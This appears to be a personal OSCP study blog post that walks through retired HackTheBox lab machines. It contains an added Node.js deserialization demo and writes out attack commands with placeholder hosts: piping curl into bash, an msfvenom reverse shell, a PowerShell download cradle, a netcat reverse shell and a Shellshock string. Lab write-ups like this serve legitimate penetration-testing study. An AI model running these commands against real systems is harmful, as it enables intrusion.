OSCP Week 13: HackTheBox (Part 1)

My first week of OSCP study without access to the OSCP lab environment! I decided to take it a little easy and give myself a bit of a break, but still went through a decent number of retired machines on the HackTheBox network. For each machine, I watched the IppSec video in full to gain a complete understanding of the machine and learn as much as I could from his methodology. From there, I went ahead and exploited the machine myself to further cement what I had gained from his video. I had a lot of fun learning some of IppSec’s tricks and general way of thinking and approaching a machine, so I highly recommend his videos to anyone, regardless of skill level. Currently, I’m going through the videos in his “HTB Boxes to Prepare for OSCP” Playlist but he also has an excellent beginner playlist available.

Below are my quick thoughts on the machines I went through, followed by the “key takeaways” that I gained from each.

Bashed

This machine had a pretty interesting privilege escalation that I hadn’t seen before, where a python script was running as a root cron job. I hadn’t experimented much with cron jobs before, so identifying + exploiting one was entirely new to me.

Key Takeaways:

Seeing that www-data could sudo to the user scriptmanager without a password, either from LinEnum.sh output or from running sudo -l (which here reports (scriptmanager : scriptmanager) NOPASSWD: ALL). The command to spawn a new session as this user is:
sudo -u scriptmanager bash -i

Using ls -la on the /scripts/ directory to view ownership, permissions and timestamps of the files there. The output file is owned by root and its timestamp is refreshed every minute, which indicates a cron job running the script as root, while the directory itself is writable by scriptmanager (the reason the sudo step above matters). Any script in that directory can therefore be edited or replaced with reverse shell code (a Python one-liner, since the cron job runs Python), and it will execute with root privileges on the next run.

Celestial

A more difficult machine, Celestial provided an example of a deserialization exploit in NodeJS. I was not very familiar with NodeJS or the serialization of data, so it was difficult for me to fully grasp the mechanics behind this, but I still found some sections useful.

Key Takeaways:

Using the FoxyProxy Firefox extension, proxy settings can be switched to forward browser traffic to Burp Suite, where the cookie can be captured and modified. On this machine the cookie holds a serialized object that the Node application deserializes on every request, so forwarding a request with a crafted cookie can carry a function that runs during deserialization, giving code execution. One way to test for execution before going for a shell is to have the payload ping your attacking machine while tcpdump listens for ICMP (tcpdump -i tun0 icmp, tun0 being the VPN interface).
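The bug class behind this, as an added example in Node that is not code from the original post or from the Celestial application: a cookie carrying base64-encoded JSON, an unsafe deserializer that rebuilds marked strings with eval() (the marker and the immediately-invoked-function trick mirror the node-serialize package), and a hardened parser that treats the cookie as data only. The field names, the canary and the cookie layout are assumptions for the demo.

```javascript
// Added example, not code from the original post or from the Celestial
// application: a minimal model of the Node deserialization bug class the
// post describes. The profile cookie is base64-encoded JSON; the unsafe
// deserializer treats any string starting with a marker as source code and
// rebuilds it with eval(), so a cookie whose "function" is actually an
// immediately-invoked function runs code the moment it is deserialized.
// Field names and the canary are assumptions for this demo.
const FUNC_FLAG = '_$$ND_FUNC$$_';

// Canary standing in for "code ran on the server". A real payload would call
// require('child_process').exec('ping -c 1 <attacker-ip>'), which is what the
// tcpdump check in the post detects.
let fired = 0;
global.__canary = () => { fired += 1; };
function timesFired() { return fired; }

// Vulnerable: walk the object and eval() any marked string back into a function.
function unserializeUnsafe(obj) {
  for (const key of Object.keys(obj)) {
    const v = obj[key];
    if (typeof v === 'string' && v.startsWith(FUNC_FLAG)) {
      obj[key] = eval('(' + v.slice(FUNC_FLAG.length) + ')'); // attacker text executes here
    } else if (v !== null && typeof v === 'object') {
      unserializeUnsafe(v);
    }
  }
  return obj;
}

// Hardened: the cookie is data only. Copy the fields the application needs,
// require them to be plain strings, and never turn a string back into code.
function validateProfile(obj) {
  const out = {};
  for (const field of ['username', 'country', 'city', 'num']) {
    if (typeof obj[field] !== 'string') throw new Error('bad profile cookie: ' + field);
    out[field] = obj[field];
  }
  return out;
}

// Server side: decode the cookie, then either revive functions (bug) or validate (fix).
function parseProfileCookie(cookie, reviveFunctions) {
  const obj = JSON.parse(Buffer.from(cookie, 'base64').toString('utf8'));
  return reviveFunctions ? unserializeUnsafe(obj) : validateProfile(obj);
}

// Attacker side: a profile whose username is a marked IIFE. Sending this as the
// cookie is the "forward a request with a modified cookie" step done in Burp.
function buildMaliciousCookie() {
  const profile = {
    username: FUNC_FLAG + 'function(){ global.__canary(); return "pwned"; }()',
    country: 'x', city: 'x', num: '1',
  };
  return Buffer.from(JSON.stringify(profile)).toString('base64');
}

// Demo: the same cookie is harmless to the hardened parser and executes in the vulnerable one.
const demoCookie = buildMaliciousCookie();
console.log('safe parser  : username kept as text, fired=' + timesFired(),
  parseProfileCookie(demoCookie, false).username.slice(0, FUNC_FLAG.length));
console.log('unsafe parser: username =', parseProfileCookie(demoCookie, true).username,
  'fired=' + timesFired());
```

The hardened parser does not need to know the marker at all; the point is that nothing in the request path may ever turn a string into code, so even a cookie containing the marker is just an odd username.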

curl can be used to fetch a reverse shell script from a web server on your attacking machine, and piping the output into bash executes it immediately without writing anything to disk. This can be more useful than wget when you have fewer permissions or a less interactive shell.
curl x.x.x.x/shell.sh | bash

Another way to enumerate cron jobs on the victim machine is to read the syslog file, where each CRON entry records the user and the command that was run; here it shows a script being run as root. In the same way as Bashed, editing that script to contain reverse shell code gets it executed with root privileges on the next run.
Syslog can be accessed using cat /var/log/syslog

Devel

I used metasploit for this machine, because I didn’t have a lot of experience using the metasploit privilege escalation suggester and exploit modules. A straightforward box that contained an FTP vulnerability I had seen before, but good experience nonetheless.

Key Takeaways:

Google can be used to find the version of Windows from the IIS version number provided by a basic nmap scan. Further googling about IIS will tell you that it executes .asp and .aspx files, so a reverse shell in one of those formats works if it can be uploaded to the webroot. In this case, anonymous FTP access allowed writes and the FTP root was the IIS webroot, so the command put devel.aspx was all that was required to upload, and browsing to /devel.aspx executed it.

The 3 basic flags required for msfvenom, alongside LPORT and LHOST are:
-p for payload
-f for format
-o output
For this machine, a meterpreter reverse shell can be generated using: msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f aspx -o devel.aspx

A meterpreter session can be useful for enumeration of a machine: its own sysinfo command gives the OS and architecture, and dropping to a shell and running systeminfo dumps OS, Service Pack, architecture and hotfix information.

Metasploit has a local exploit suggester (post/multi/recon/local_exploit_suggester) which checks a session against its local privilege escalation modules. It only considers exploits matching the architecture of the meterpreter session, so an x86 meterpreter on a 64-bit host would miss x64-only exploits; Devel is 32-bit, so the x86 payload above is fine. It is effective at identifying which exploits the machine is vulnerable to, and makes privilege escalation much more trivial.

Legacy

Not much to see here other than the outdated SMB service on Windows XP! Identical to what I’ve seen before, using metasploit and the notorious ms08-067 exploit module gets you an instant shell with SYSTEM privileges.

Bastard

A harder machine that contained a lot of different steps to complete, Bastard taught me a lot about both session manipulation and PHP exploitation. I actually struggled a lot getting the PHP code to execute, and when it did I wasn’t able to obtain any stable shells. In the end I had to really persevere and work with what I was able to get to make this machine work.

Key Takeaways:

Droopescan – a scanner for Drupal websites similar to wpscan for WordPress sites.

Using a Drupal exploit to obtain an admin session cookie, which can be loaded into the browser via a cookie manager extension. This bypasses the login page and gives access to the admin console, where code execution is possible by creating an article whose body contains PHP code (with the PHP filter module enabled).

IppSec covered some powershell wizardry in his video for this machine, most of which went over my head. I was, however, able to pick up a couple of ways he got files onto the machine through the upload (fupload) and execute (fexec) parameters of the helper page he had planted:

  • Running a PowerShell download cradle, which fetches a script (here PowerUp.ps1) from the attacking machine’s web server and executes it in memory: fexec=echo IEX(New-Object Net.WebClient).DownloadString('http://x.x.x.x:80/PowerUp.ps1') | powershell -noprofile -
  • Uploading a compiled version of netcat and immediately using it for a reverse shell: fupload=nc64.exe&fexec=nc64.exe -e cmd x.x.x.x 4444

Enumerating the version of Windows and the patches applied. Listing the contents of \Windows\SoftwareDistribution\Download shows the patches that have been downloaded (but not necessarily installed). Running type \Windows\WindowsUpdate.log is also useful, as it shows when and which patches were actually installed; the hotfix list from systeminfo is the quicker cross-check.

Beep

Another easier machine, Beep has a lot of services to sift through on the initial enumeration attempts, but was straightforward enough once you found the vulnerability. IppSec’s video for this machine proved that there are many ways to obtain a low privilege shell on this machine, but I found the easiest way the most obvious.

Key Takeaways:

SSH bruteforcing may be blocked on some machines if they have rules or processes set to lock users out after a set number of failed authentication attempts. This machine was running fail2ban, which meant that Hydra was useless and the root password needed to be found via other methods. This highlights the need for thorough enumeration to find what sort of systems exist on a machine before you try to exploit! Fail2ban’s jail configuration (/etc/fail2ban/jail.conf, with local overrides in jail.local) shows which services it watches and the maxretry and bantime thresholds; fail2ban.conf itself only holds the daemon’s own settings.

IppSec ran through his method of using an LFI vulnerability to view the vulnerable page’s source and check whether RFI or RCE was possible. He explained that when the PHP code uses an include statement on user-controlled input, RCE could be possible. This was a touch advanced for me, but it was very interesting to see him dissect and reverse engineer an exploit to see if he could leverage it further. Eventually, he was able to use snmp to execute code and receive a reverse shell.

Burp Suite’s proxy can handle the TLS side when an exploit script cannot: point the exploit at a plain-HTTP listener on localhost and configure that listener (Proxy > Options > Request handling) to redirect to the victim host and port with “Force use of SSL” enabled, so Burp makes the HTTPS connection and the self-signed certificate never troubles the script. This requires some configuration but is useful to keep in mind if I ever run into this problem myself. Without doing this, the initial exploit would not run, so it was a necessary step in the exploitation process.

Shellshock on webmin – this is something that I need to look into more. I believe there is a machine dedicated to this in the retired machine rotation, but IppSec was able to exploit the webmin service using Shellshock to gain a reverse shell. The basic syntax for Shellshock is: () { :; }; command  The string has to land in something that becomes an environment variable for a bash-backed CGI handler (typically the User-Agent or Referer header), and a vulnerable bash executes the trailing command when it imports the function definition.

That’s all for this weeks post. I apologize that this probably isn’t going to be the most useful for anyone other than myself, but I still want to carry on documenting everything I do up until the OSCP exam next month. Not far to go now!

Kento.
